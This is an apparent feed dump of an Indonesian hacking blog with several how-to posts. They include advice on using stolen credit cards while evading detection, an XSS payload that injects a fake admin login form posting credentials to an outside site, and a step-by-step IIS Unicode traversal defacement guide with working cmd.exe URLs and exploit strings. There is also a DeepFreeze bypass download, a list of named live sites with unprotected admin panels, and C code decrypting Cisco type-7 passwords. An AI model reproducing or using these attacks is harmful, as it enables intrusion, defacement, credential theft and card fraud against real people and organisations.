(secure HTTP). Dial-in server yang&lt;br /&gt;kamu gunakan punya catatan nomor mana yang memanggil. Dan, kalo&lt;br /&gt;dipikir-pikir, jika kamu benar-benar konak, kenapa susah-susah, sih? Toh&lt;br /&gt;gambar-gambar kayak gituan banyak tersedia eceran kaki lima. Menggunakan&lt;br /&gt;kartu kredit milik orang ada gunanya jika misalnya kamu berhasil&lt;br /&gt;mendapatkan kartu kredit milik Bambang Suharto atau sodara-sodaranya. Nah,&lt;br /&gt;itu baru enak, bisa kamu porotin tuh orang-orang yang selama ini morotin&lt;br /&gt;rakyat.&lt;br /&gt;&lt;br /&gt;2. Kita bisa menggunakan kartu kredit hasil dari 'CC Generator'.&lt;br /&gt;Biasanya tidak benar. Memang, banyak program-program yang beredar di&lt;br /&gt;internet dan bisa menghasilkan nomor kartu kredit, namun program-program&lt;br /&gt;tsb biasanya bekerja atas dasar logaritma nomor kartu kredit. Dan 'nomor&lt;br /&gt;kartu kredit' hasil buatan program-program tsb adalah fiktif. Sedikit&lt;br /&gt;servis di Internet yang melakukan check hanya berdasarkan algoritma ini&lt;br /&gt;saja. Pada umumnya servis-servis komersial menggunakan check berdasar:&lt;br /&gt;Nama Pemegang Kartu, Nomor Kartu, dan Kode Pos alamat pemegang kartu.&lt;br /&gt;&lt;br /&gt;3. Saya sudah berhasil mendapatkan password/login untuk barely.hustler.com&lt;br /&gt;   (atau sejenisnya) tentunya mulai dari sekarang, saya selalu bisa&lt;br /&gt;   mengakses site tsb sebagai 'member'.&lt;br /&gt;Tidak benar. Biasanya nomor kartu kredit hasil curian mempunyai 'umur&lt;br /&gt;hidup' tertentu. Umur hidup ini bervariasi. Kadang-kadang setelah kamu&lt;br /&gt;meregistrasi/mengorder barang pada malam hari, keesokan harinya sang&lt;br /&gt;perusahaan korban melakukan check, dan menemukan kejanggalan (contoh:&lt;br /&gt;Alamat tidak sinkron). Atau bisa juga minggu depannya. Kemungkinan lain&lt;br /&gt;adalah sang pemilik kartu kredit yang asli akan menemukan kejanggalan di&lt;br /&gt;'bill' (laporan rekening) kartu kreditnya. Hal ini akan membuatnya waspada&lt;br /&gt;dan melaporkan kepada bank/institusi finansialnya. Segera setelah itu,&lt;br /&gt;account ilegal kamu akan dimatikan (dan, jika serius masalahnya, bisa&lt;br /&gt;dilakukan pelacakan). Cara yang bisa digunakan untuk memperpanjang 'umur&lt;br /&gt;hidup' nomor curianmu antara lain adalah dengan cara menggunakan kartu&lt;br /&gt;kredit korporasi (milik perusahaan besar), membatasi transaksi ilegal yang&lt;br /&gt;dilakukan (jangan diumbar sekali pakai habisin $200), dlsb.&lt;br /&gt;&lt;br /&gt;4. Jangan sekali-kali menggunakan kartu kredit untuk telepon SLJJ/Long&lt;br /&gt;Distance.&lt;br /&gt;Cukup benar. Di Amerika, perusahaan-perusahaan seperti Sprint, AT&amp;T, dll&lt;br /&gt;menerima kartu kredit sebagai ganti koin untuk layanan telepon jarak jauh,&lt;br /&gt;atau bahkan kadang-kadang internasional. Walaupun kamu menggunakan telepon&lt;br /&gt;umum, resiko masih ada. Mereka bisa melacak siapa yang kamu telepon. Hal&lt;br /&gt;ini tentunya bukan masalah jika kamu menelepon teman kamu yang *juga*&lt;br /&gt;menggunakan telepon umum, atau teman kamu yang tinggal di, ... Libya,&lt;br /&gt;misalnya.&lt;br /&gt;&lt;br /&gt;Penutup&lt;br /&gt;=======&lt;br /&gt;&lt;br /&gt;Kayaknya cukup segini dulu, deh, sebab udah mulai kepanjangan nih. Saran&lt;br /&gt;saya kepada kalian yang tertarik untuk menjadi 'professional carder',&lt;br /&gt;hati-hatilah selalu. Eksplorasi adalah hal yang baik, tapi pastikan&lt;br /&gt;sedapat mungkin kamu tidak merugikan orang lain atau dirimu sendiri. Gitu&lt;br /&gt;dulu, deh. Ciao ..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-3778991595670889604?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/3778991595670889604/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=3778991595670889604' title='25 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/3778991595670889604'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/3778991595670889604'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/cara-carding.html' title='Cara Carding'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>25</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-1833593071680539657</id><published>2007-03-31T04:23:00.000+07:00</published><updated>2007-03-31T04:24:09.456+07:00</updated><title type='text'>Comersus Shoping Cart</title><content type='html'>Dengan google, cari kata kuncinya :&lt;br /&gt;allinurl:comersus_message.asp&lt;br /&gt;allinurl:comersus_backoffice_message.asp &lt;br /&gt;&lt;br /&gt;setelah itu kita beri tambahan dengan croos scripting, misalnya :&lt;br /&gt; &lt;br /&gt;http://www.target.net/comersus/store/comersus_message.asp?message=&lt;h4&gt;PeNcOpEt_CiNtA&lt;/h4&gt;&lt;br /&gt;&lt;br /&gt;atau kita bisa mengirim email untuk admin hehehehe ini contoh lagi :&lt;br /&gt; &lt;br /&gt;http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=&lt;br /&gt;&lt;form%20action=http://mysite.org/comersus.php%20method=post&gt;&lt;h3&gt;BackOffice%20Lite&lt;/h3&gt;&lt;br /&gt;&lt;p&gt;User &lt;br /&gt;&lt;input%20type=text%20name=uid&gt;&lt;br /&gt;Password&lt;br /&gt;sekian dulu aja yachhh, entar nyambung lagi&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-1833593071680539657?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/1833593071680539657/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=1833593071680539657' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/1833593071680539657'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/1833593071680539657'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/comersus-shoping-cart.html' title='Comersus Shoping Cart'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-1782731137598911231</id><published>2007-03-31T04:22:00.000+07:00</published><updated>2007-03-31T04:23:06.202+07:00</updated><title type='text'>Deface NT Web</title><content type='html'>Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja&lt;br /&gt;itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah&lt;br /&gt;ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating &lt;br /&gt;System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :&lt;br /&gt;1. IIS (server untuk microsoft, dkk)&lt;br /&gt;2. Unix(linux,BSD,IRIX,SOLARIS,dsb)&lt;br /&gt;&lt;br /&gt;Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam&lt;br /&gt;komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :&lt;br /&gt;&lt;br /&gt;~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~&lt;br /&gt;-------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang &lt;br /&gt;menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.&lt;br /&gt;&lt;br /&gt;OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan &lt;br /&gt;MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..&lt;br /&gt;setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh: &lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;&lt;br /&gt;Ada dua kemungkinan yang tampil pada browser Anda yaitu: &lt;br /&gt;Kahiji : Muncul pesan ERROR ...&lt;br /&gt;Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka&lt;br /&gt;www.targethost.com tadi ada kemungkinan untuk bisa kita deface...&lt;br /&gt;&lt;br /&gt;Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :&lt;br /&gt;• Bagian host, yaitu "http://www.targethost.com" &lt;br /&gt;• Bagian exploit string, yaitu "/scripts/..%255c..%255c"&lt;br /&gt;• Bagian folder, yaitu "/winnt/system32/" &lt;br /&gt;• Bagian command, yaitu "cmd.exe?/c+dir+c:\" &lt;br /&gt;&lt;br /&gt;Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh&lt;br /&gt;file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\" &lt;br /&gt;atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge&lt;br /&gt;tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"&lt;br /&gt;&lt;br /&gt;Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada &lt;br /&gt;browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering &lt;br /&gt;tembus adalah :&lt;br /&gt;- /cgi-bin/..%255c..%255c&lt;br /&gt;- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..&lt;br /&gt;- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;br /&gt;- /scripts/..%255c..%255c&lt;br /&gt;&lt;br /&gt;Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka &lt;br /&gt;kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).&lt;br /&gt;&lt;br /&gt;Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah &lt;br /&gt;mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,&lt;br /&gt;index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. &lt;br /&gt;Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau &lt;br /&gt;D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini &lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set&lt;br /&gt;&lt;br /&gt;URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...&lt;br /&gt;Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :&lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot&lt;br /&gt;&lt;br /&gt;Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih &lt;br /&gt;lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....&lt;br /&gt;truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window.... &lt;br /&gt;http://www.targethost.com == neh yg ini......di situ kan alias di &lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot &lt;br /&gt;dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di &lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :&lt;br /&gt;Directory of C:\InetPub\wwwroot&lt;br /&gt;07/20/01 03:21p 1,590 default.htm&lt;br /&gt;07/20/01 03:21p 590 index.html&lt;br /&gt;07/20/01 03:21p 3,453 main.html&lt;br /&gt;&lt;br /&gt;Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...&lt;br /&gt;contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :&lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html&lt;br /&gt;&lt;br /&gt;Lihat apa yg terjadi di IE kitaa&lt;br /&gt;&lt;br /&gt;CGI Error&lt;br /&gt;The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:&lt;br /&gt;Access is denied&lt;br /&gt;&lt;br /&gt;Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat &lt;br /&gt;targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??&lt;br /&gt;&lt;br /&gt;CGI Error&lt;br /&gt;The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :&lt;br /&gt;&lt;br /&gt;Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site &lt;br /&gt;tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee&lt;br /&gt;(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk &lt;br /&gt;langkah selanjutnyah*)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..&lt;br /&gt;Kedua lewat TFTP32.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;*Cara pertama :*&lt;br /&gt;Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori &lt;br /&gt;C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe&lt;br /&gt;. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL &lt;br /&gt;berikut :&lt;br /&gt;&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-1782731137598911231?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/1782731137598911231/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=1782731137598911231' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/1782731137598911231'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/1782731137598911231'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/deface-nt-web.html' title='Deface NT Web'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-3251951125800158748</id><published>2007-03-31T04:21:00.001+07:00</published><updated>2007-03-31T04:21:27.945+07:00</updated><title type='text'>Lumpuhkan Deepfreeze</title><content type='html'>Untuk Uninstall program ini atau melakukan perubahan&lt;br /&gt;yang permanen pada windows, misalnya install program&lt;br /&gt;baru, dibutuhkan password yang di set pada saat&lt;br /&gt;install DeepFreeze. &lt;br /&gt;&lt;br /&gt;Tanpa password ini jangan harap anda dapat merubah&lt;br /&gt;setting komputer anda, jadi bisa dibayangkan jikalau&lt;br /&gt;anda lupa password tersebut (mungkin yang anda lakukan&lt;br /&gt;adalah memformat hardisk tersebut).&lt;br /&gt;&lt;br /&gt;Namun jika anda mengalaminya jangan khawatir, ikuti&lt;br /&gt;langkah-langkah berikut, mudah-mudahan masalah anda&lt;br /&gt;dapat terselesaikan. &lt;br /&gt;&lt;br /&gt;1. Download "XDeepFreeze" di&lt;br /&gt;http://geocities.com/macancrew/xdeepfreeze.zip&lt;br /&gt;&lt;br /&gt;2. Ekstrak ke C:\XDeepfreeze&lt;br /&gt;&lt;br /&gt;3. Jalankan "Run_Me.exe" yang akan menghasilkan file&lt;br /&gt;"mcr.bat" dan "XDeepFreeze.exe" akan terload.&lt;br /&gt;&lt;br /&gt;4. Pada XDeepFreeze, Tekan "Stop DeepFreeze", untuk&lt;br /&gt;menghentikan "frzstate.exe"&lt;br /&gt;&lt;br /&gt;5. Pada XDeepFreeze, Tekan "Clean Registry", untuk&lt;br /&gt;membersihkan registry yang dibuat deepfreeze pada saat&lt;br /&gt;install.&lt;br /&gt;&lt;br /&gt;6. Untuk masuk ke MS-Dos Mode, Jalankan "command.com"&lt;br /&gt;(Sudah disertakan pada "xdeepfreeze.zip")&lt;br /&gt;&lt;br /&gt;7. Jalankan "mcr.bat" (Berisi perintah yang akan&lt;br /&gt;menghapus file "persifrz.vxd")&lt;br /&gt;&lt;br /&gt;8. Ketik "Exit" untuk masuk ke Windows kembali.&lt;br /&gt;   Dan.....DeepFreeze tidak berfungsi lagi.&lt;br /&gt;&lt;br /&gt;Silahkan install ulang DeepFreeze, ingat dan catat&lt;br /&gt;baik-baik password yang anda gunakan.&lt;br /&gt;Jika anda lupa lagi lakukan kembali cara diatas&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-3251951125800158748?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/3251951125800158748/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=3251951125800158748' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/3251951125800158748'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/3251951125800158748'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/lumpuhkan-deepfreeze.html' title='Lumpuhkan Deepfreeze'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-8841540038209384347</id><published>2007-03-31T04:18:00.002+07:00</published><updated>2007-03-31T04:20:39.704+07:00</updated><title type='text'>ASP</title><content type='html'>lebih lanjut...&lt;br /&gt;ARF yang dikeluarkan oleh http://www.asp-dev.com/ bekerja pada platform Windows memiliki bug yang sangat fatal. Yaitu admin (sebenarnya admin atau pembuat template ya ?) tidak memberikan login username dan password pada bagian administrator web nya, sehingga siapa saja bisa masuk melalui http://www.target.com/forum/admin/default.asp &lt;br /&gt;&lt;br /&gt;Sehingga semua orang bisa masuk dan melakukan editing / penghapusan / penambahan isi dari BBS -nya. &lt;br /&gt;&lt;br /&gt;Jika anda menggunakan template tersebut dalam BBS anda, sebaiknya menambahkan login username dan password pada bagian /admin/default.asp sehingga BBS anda terhindar dari kejahilan orang lain. &lt;br /&gt;&lt;br /&gt;Contoh yang bisa dicoba seperti berikut ini (saat penulisan ini belum dipatch) : &lt;br /&gt;1. http://www.rvnair.com/bbs/admin/default.asp &lt;br /&gt;2. http://www.equuspages.com/forum/forum2/admin/ &lt;br /&gt;3. http://www.joinweb.com/forum/admin/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-8841540038209384347?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/8841540038209384347/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=8841540038209384347' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8841540038209384347'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/8841540038209384347'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/asp.html' title='ASP'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-8882699389363957068</id><published>2007-03-31T04:18:00.001+07:00</published><updated>2007-03-31T04:18:30.021+07:00</updated><title type='text'>Hack FTP</title><content type='html'>#include &lt;br /&gt;#include &lt;br /&gt;&lt;br /&gt; char xlat[] = {&lt;br /&gt;        0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,&lt;br /&gt;        0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,&lt;br /&gt;        0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44&lt;br /&gt;};&lt;br /&gt; &lt;br /&gt;char pw_str1[] = "password 7 ";&lt;br /&gt;char pw_str2[] = "enable-password 7 ";&lt;br /&gt; &lt;br /&gt;char *pname;&lt;br /&gt; &lt;br /&gt;cdecrypt(enc_pw, dec_pw)&lt;br /&gt;char *enc_pw;&lt;br /&gt;char *dec_pw;&lt;br /&gt;{&lt;br /&gt;        unsigned int seed, i, val = 0;&lt;br /&gt; &lt;br /&gt;        if(strlen(enc_pw) &amp; 1)&lt;br /&gt;                return(-1);&lt;br /&gt; &lt;br /&gt;        seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';&lt;br /&gt; &lt;br /&gt;        if (seed &gt; 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))&lt;br /&gt;                return(-1);&lt;br /&gt; &lt;br /&gt;        for (i = 2 ; i &lt;= strlen(enc_pw); i++) {&lt;br /&gt;                if(i !=2 &amp;&amp; !(i &amp; 1)) {&lt;br /&gt;                        dec_pw[i / 2 - 2] = val ^ xlat[seed++];&lt;br /&gt;                        val = 0;&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                val *= 16;&lt;br /&gt; &lt;br /&gt;                if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {&lt;br /&gt;                        val += enc_pw[i] - '0';&lt;br /&gt;                        continue;&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if(enc_pw[i] &gt;= 'A' &amp;&amp; enc_pw[i] &lt;= 'F') {&lt;br /&gt;                        val += enc_pw[i] - 'A' + 10;&lt;br /&gt;                        continue;&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if(strlen(enc_pw) != i)&lt;br /&gt;                        return(-1);&lt;br /&gt;        }&lt;br /&gt; &lt;br /&gt;        dec_pw[++i / 2] = 0;&lt;br /&gt; &lt;br /&gt;        return(0);&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;usage()&lt;br /&gt;{&lt;br /&gt;        fprintf(stdout, "Usage: %s -p \n", pname);&lt;br /&gt;        fprintf(stdout, "       %s  \n", pname);&lt;br /&gt; &lt;br /&gt;        return(0);&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;main(argc,argv)&lt;br /&gt;int argc;&lt;br /&gt;char **argv;&lt;br /&gt; &lt;br /&gt;{&lt;br /&gt;        FILE *in = stdin, *out = stdout;&lt;br /&gt;        char line[257];&lt;br /&gt;        char passwd[65];&lt;br /&gt;        unsigned int i, pw_pos;&lt;br /&gt; &lt;br /&gt;        pname = argv[0];&lt;br /&gt; &lt;br /&gt;        if(argc &gt; 1)&lt;br /&gt;        {&lt;br /&gt;                if(argc &gt; 3) {&lt;br /&gt;                        usage();&lt;br /&gt;                        exit(1);&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if(argv[1][0] == '-')&lt;br /&gt;                {&lt;br /&gt;                        switch(argv[1][1]) {&lt;br /&gt;                                case 'h':&lt;br /&gt;                                usage();&lt;br /&gt;                                break;&lt;br /&gt; &lt;br /&gt;                                case 'p':&lt;br /&gt;                                if(cdecrypt(argv[2], passwd)) {&lt;br /&gt;                                        fprintf(stderr, "Error.\n");&lt;br /&gt;                                        exit(1);&lt;br /&gt;                                }&lt;br /&gt;                                fprintf(stdout, "password: %s\n", &lt;br /&gt;passwd);&lt;br /&gt;                                break;&lt;br /&gt; &lt;br /&gt;                                default:&lt;br /&gt;                                fprintf(stderr, "%s: unknow option.", &lt;br /&gt;pname);&lt;br /&gt;                        }&lt;br /&gt; &lt;br /&gt;                        return(0);&lt;br /&gt;                }&lt;br /&gt; &lt;br /&gt;                if((in = fopen(argv[1], "rt")) == NULL)&lt;br /&gt;                        exit(1);&lt;br /&gt;                if(argc &gt; 2)&lt;br /&gt;                        if((out = fopen(argv[2], "wt")) == NULL)&lt;br /&gt;                                exit(1);&lt;br /&gt;        }&lt;br /&gt; &lt;br /&gt;        while(1) {&lt;br /&gt;                for(i = 0; i &lt; 256; i++) {&lt;br /&gt;                        if((line[i] = fgetc(in)) == EOF) {&lt;br /&gt;                                if(i)&lt;br /&gt;                                        break;&lt;br /&gt; &lt;br /&gt;                                fclose(in);&lt;br /&gt;                                fclose(out);&lt;br /&gt;                                return(0);&lt;br /&gt;                        }&lt;br /&gt;                        if(line[i] == '\r')&lt;br /&gt;                                i--;&lt;br 